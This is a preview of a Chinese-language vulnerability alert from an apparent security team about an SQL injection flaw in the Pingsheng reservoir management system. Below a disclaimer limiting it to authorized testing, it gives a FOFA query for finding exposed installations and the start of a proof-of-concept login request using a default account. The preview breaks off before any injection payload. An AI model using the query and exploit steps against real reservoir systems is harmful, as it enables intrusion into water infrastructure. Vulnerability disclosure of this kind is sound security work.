漏洞预警 平升水库系统 databaseservice SQL注入漏洞

文章预览

0x01 阅读须知 融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。 本文所提 供的工具仅用于学习，禁止用于 其他！ ！ ！ 0x02 漏洞描述 平升 水库系统 databaseservice 存在SQL注入漏洞。 0x03 漏洞复现 fofa-qeury: body="js/PSExtend.js" 1.执行poc进行默认账号登录获取Guid，注入得到md5结果 - | POST /Webservices/UserAdminService.asmx/Login HTTP/1.1 Host : User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept : application/json, text/plain, */* Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encodin ………………………………